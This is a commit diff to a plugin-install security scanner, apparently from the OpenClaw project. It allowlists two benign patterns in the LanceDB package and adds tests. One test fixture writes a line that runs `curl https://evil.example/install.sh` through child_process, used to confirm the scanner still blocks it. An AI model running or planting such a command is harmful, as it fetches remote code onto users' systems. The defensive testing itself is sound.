fix(plugins): allow benign LanceDB runtime shims

steipete · steipete · commit 439e39626220 · 2026-05-13T20:24:46.000+01:00
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -16,6 +16,7 @@ Docs: https://docs.openclaw.ai
 - Gateway: hide pending Node pairing commands, capabilities, and permissions until approval, and refresh the live approved surface when pairings change. (#80741) Thanks @samzong.
 - SGLang: preserve replayed reasoning history for OpenAI-compatible chat completions, keeping thinking-capable local models from losing prior reasoning turns. (#81091) Thanks @akrimm702.
 - Plugins/Feishu/WhatsApp/Line: enforce inbound media size caps while reading download streams, avoiding full buffering of oversized attachments. (#81044, #81050) Thanks @samzong.
+- Plugins/install: allow LanceDB's native-binding platform probe and Transformers ESM import shim during installed dependency scans, so plugins depending on `@lancedb/lancedb` no longer get disabled during update while other dependency `child_process`/`eval` hits still block.
 - Config: serialize and retry semantic config mutations centrally, so concurrent commands can rebase safe changes instead of clobbering or hand-rolling command-local retry loops. (#76601)
 - Require approval for setup-code device pairing [AI]. (#81292) Thanks @pgondhi987.
 - Plugins/install: preserve third-party peer dependencies in the managed npm root when later plugin installs or updates recalculate the shared dependency tree. Thanks @shakkernerd.
diff --git a/src/plugins/install-security-scan.runtime.ts b/src/plugins/install-security-scan.runtime.ts
@@ -27,6 +27,7 @@ type InstallScanFinding = {
   file: string;
   line: number;
   message: string;
+  evidence?: string;
 };
 
 type BuiltinInstallScan = {
@@ -339,6 +340,27 @@ function buildBuiltinScanFromSummary(summary: {
   };
 }
 
+function rebuildBuiltinScanCounts(scan: BuiltinInstallScan): BuiltinInstallScan {
+  let critical = 0;
+  let warn = 0;
+  let info = 0;
+  for (const finding of scan.findings) {
+    if (finding.severity === "critical") {
+      critical += 1;
+    } else if (finding.severity === "warn") {
+      warn += 1;
+    } else {
+      info += 1;
+    }
+  }
+  return {
+    ...scan,
+    critical,
+    warn,
+    info,
+  };
+}
+
 const DEFAULT_PACKAGE_MANIFEST_TRAVERSAL_LIMITS: PackageManifestTraversalLimits = {
   maxDepth: 64,
   maxDirectories: 10_000,
@@ -540,6 +562,56 @@ async function collectNonOverlappingPackageScanRoots(packageDirs: string[]): Pro
   return selectedRoots.map((selectedRoot) => selectedRoot.packageDir);
 }
 
+function normalizeRelativeScanPath(relativePath: string): string {
+  return relativePath.split(path.sep).join("/");
+}
+
+function isKnownBenignLanceDbFinding(params: {
+  finding: InstallScanFinding;
+  packageDir: string;
+}): boolean {
+  const relativePath = normalizeRelativeScanPath(
+    path.relative(params.packageDir, params.finding.file),
+  );
+  const evidence = params.finding.evidence ?? "";
+  if (params.finding.ruleId === "dangerous-exec" && relativePath === "dist/native.js") {
+    return (
+      /child_process/.test(evidence) &&
+      /\bexecSync\(\s*['"](?:ldd --version|which ldd)['"]/.test(evidence)
+    );
+  }
+  if (
+    params.finding.ruleId === "dynamic-code-execution" &&
+    relativePath === "dist/embedding/transformers.js"
+  ) {
+    return /\beval\(\s*['"]import\(["']@huggingface\/transformers["']\)['"]\s*\)/.test(evidence);
+  }
+  return false;
+}
+
+async function suppressKnownBenignInstalledDependencyFindings(params: {
+  builtinScan: BuiltinInstallScan;
+  packageDir: string;
+}): Promise<BuiltinInstallScan> {
+  if (params.builtinScan.status !== "ok" || params.builtinScan.findings.length === 0) {
+    return params.builtinScan;
+  }
+  const manifest = await tryReadJson<PackageManifest>(path.join(params.packageDir, "package.json"));
+  if (manifest?.name !== "@lancedb/lancedb") {
+    return params.builtinScan;
+  }
+  const findings = params.builtinScan.findings.filter(
+    (finding) => !isKnownBenignLanceDbFinding({ finding, packageDir: params.packageDir }),
+  );
+  if (findings.length === params.builtinScan.findings.length) {
+    return params.builtinScan;
+  }
+  return rebuildBuiltinScanCounts({
+    ...params.builtinScan,
+    findings,
+  });
+}
+
 async function collectPackageManifestPaths(params: {
   allowManagedNpmRootPackagePeerSymlinks?: boolean;
   rootDir: string;
@@ -764,6 +836,7 @@ async function scanManifestDependencyDenylist(params: {
 }
 
 async function scanDirectoryTarget(params: {
+  deferBuiltinWarnings?: boolean;
   excludeTestFiles?: boolean;
   failOnTruncated?: boolean;
   includeHiddenDirectories?: boolean;
@@ -793,7 +866,7 @@ async function scanDirectoryTarget(params: {
       );
     }
     const builtinScan = buildBuiltinScanFromSummary(scanSummary);
-    if (params.suppressBuiltinWarnings) {
+    if (params.suppressBuiltinWarnings || params.deferBuiltinWarnings) {
       return builtinScan;
     }
     if (scanSummary.critical > 0) {
@@ -1196,7 +1269,10 @@ export async function scanInstalledPackageDependencyTreeRuntime(params: {
     }
     const packageRealPath = await fs.realpath(packageDir).catch(() => path.resolve(packageDir));
     const isPluginRoot = packageRealPath === pluginRootRealPath;
-    const builtinScan = await scanDirectoryTarget({
+    const installedTreeSuspiciousMessage = `Plugin "{target}" installed tree has {count} suspicious code pattern(s). Run "openclaw security audit --deep" for details.`;
+    const installedTreeWarningMessage = `WARNING: Plugin "${params.pluginId}" installed tree contains dangerous code patterns`;
+    const rawBuiltinScan = await scanDirectoryTarget({
+      deferBuiltinWarnings: true,
       excludeTestFiles: isPluginRoot,
       failOnTruncated: true,
       includeHiddenDirectories: true,
@@ -1206,10 +1282,27 @@ export async function scanInstalledPackageDependencyTreeRuntime(params: {
       maxFiles: remainingMaxFiles,
       path: packageDir,
       suppressBuiltinWarnings: params.trustedSourceLinkedOfficialInstall === true,
-      suspiciousMessage: `Plugin "{target}" installed tree has {count} suspicious code pattern(s). Run "openclaw security audit --deep" for details.`,
+      suspiciousMessage: installedTreeSuspiciousMessage,
       targetName: params.pluginId,
-      warningMessage: `WARNING: Plugin "${params.pluginId}" installed tree contains dangerous code patterns`,
+      warningMessage: installedTreeWarningMessage,
     });
+    const builtinScan = await suppressKnownBenignInstalledDependencyFindings({
+      builtinScan: rawBuiltinScan,
+      packageDir,
+    });
+    if (params.trustedSourceLinkedOfficialInstall !== true && builtinScan.status === "ok") {
+      if (builtinScan.critical > 0) {
+        params.logger.warn?.(
+          `${installedTreeWarningMessage}: ${buildCriticalDetails({ findings: builtinScan.findings })}`,
+        );
+      } else if (builtinScan.warn > 0) {
+        params.logger.warn?.(
+          installedTreeSuspiciousMessage
+            .replace("{count}", String(builtinScan.warn))
+            .replace("{target}", params.pluginId),
+        );
+      }
+    }
     const builtinBlocked = resolveBuiltinScanDecision({
       builtinScan,
       logger: params.logger,
diff --git a/src/plugins/install.test.ts b/src/plugins/install.test.ts
@@ -3135,6 +3135,105 @@ describe("installPluginFromDir", () => {
     }
   });
 
+  it("allows known benign LanceDB native loader and ESM interop patterns", async () => {
+    const caseDir = suiteTempRootTracker.makeTempDir();
+    const npmRoot = path.join(caseDir, "npm-root");
+    const pluginDir = path.join(npmRoot, "node_modules", "managed-plugin-with-lancedb");
+    const dependencyDir = path.join(npmRoot, "node_modules", "@lancedb", "lancedb");
+    fs.mkdirSync(path.join(dependencyDir, "dist", "embedding"), { recursive: true });
+    fs.mkdirSync(pluginDir, { recursive: true });
+    fs.writeFileSync(
+      path.join(pluginDir, "package.json"),
+      JSON.stringify({
+        name: "managed-plugin-with-lancedb",
+        version: "1.0.0",
+        dependencies: {
+          "@lancedb/lancedb": "0.27.2",
+        },
+        openclaw: { extensions: ["index.js"] },
+      }),
+      "utf-8",
+    );
+    fs.writeFileSync(path.join(pluginDir, "index.js"), "export {};\n", "utf-8");
+    fs.writeFileSync(
+      path.join(dependencyDir, "package.json"),
+      JSON.stringify({
+        name: "@lancedb/lancedb",
+        version: "0.27.2",
+        main: "dist/index.js",
+      }),
+      "utf-8",
+    );
+    fs.writeFileSync(path.join(dependencyDir, "dist", "index.js"), "module.exports = {};\n");
+    fs.writeFileSync(
+      path.join(dependencyDir, "dist", "native.js"),
+      `function isMuslFromChildProcess() {\n  return require('child_process').execSync('ldd --version', { encoding: 'utf8' }).includes('musl');\n}\n`,
+      "utf-8",
+    );
+    fs.writeFileSync(
+      path.join(dependencyDir, "dist", "embedding", "transformers.js"),
+      `async function init() {\n  const transformers = await eval('import("@huggingface/transformers")');\n  return transformers;\n}\n`,
+      "utf-8",
+    );
+
+    const result = await installPluginFromInstalledPackageDir({
+      packageDir: pluginDir,
+      dependencyScanRootDir: npmRoot,
+    });
+
+    expect(result.ok).toBe(true);
+    if (result.ok) {
+      expect(result.pluginId).toBe("managed-plugin-with-lancedb");
+    }
+  });
+
+  it("still blocks non-benign LanceDB dependency scanner hits", async () => {
+    const caseDir = suiteTempRootTracker.makeTempDir();
+    const npmRoot = path.join(caseDir, "npm-root");
+    const pluginDir = path.join(npmRoot, "node_modules", "managed-plugin-with-bad-lancedb");
+    const dependencyDir = path.join(npmRoot, "node_modules", "@lancedb", "lancedb");
+    fs.mkdirSync(path.join(dependencyDir, "dist"), { recursive: true });
+    fs.mkdirSync(pluginDir, { recursive: true });
+    fs.writeFileSync(
+      path.join(pluginDir, "package.json"),
+      JSON.stringify({
+        name: "managed-plugin-with-bad-lancedb",
+        version: "1.0.0",
+        dependencies: {
+          "@lancedb/lancedb": "0.27.2",
+        },
+        openclaw: { extensions: ["index.js"] },
+      }),
+      "utf-8",
+    );
+    fs.writeFileSync(path.join(pluginDir, "index.js"), "export {};\n", "utf-8");
+    fs.writeFileSync(
+      path.join(dependencyDir, "package.json"),
+      JSON.stringify({
+        name: "@lancedb/lancedb",
+        version: "0.27.2",
+        main: "dist/index.js",
+      }),
+      "utf-8",
+    );
+    fs.writeFileSync(
+      path.join(dependencyDir, "dist", "native.js"),
+      `require('child_process').execSync('curl https://evil.example/install.sh');\n`,
+      "utf-8",
+    );
+
+    const result = await installPluginFromInstalledPackageDir({
+      packageDir: pluginDir,
+      dependencyScanRootDir: npmRoot,
+    });
+
+    expect(result.ok).toBe(false);
+    if (!result.ok) {
+      expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
+      expect(result.error).toContain("@lancedb/lancedb/dist/native.js");
+    }
+  });
+
   it("scans installed managed npm peer dependencies reachable from the installed package", async () => {
     const caseDir = suiteTempRootTracker.makeTempDir();
     const npmRoot = path.join(caseDir, "npm-root");
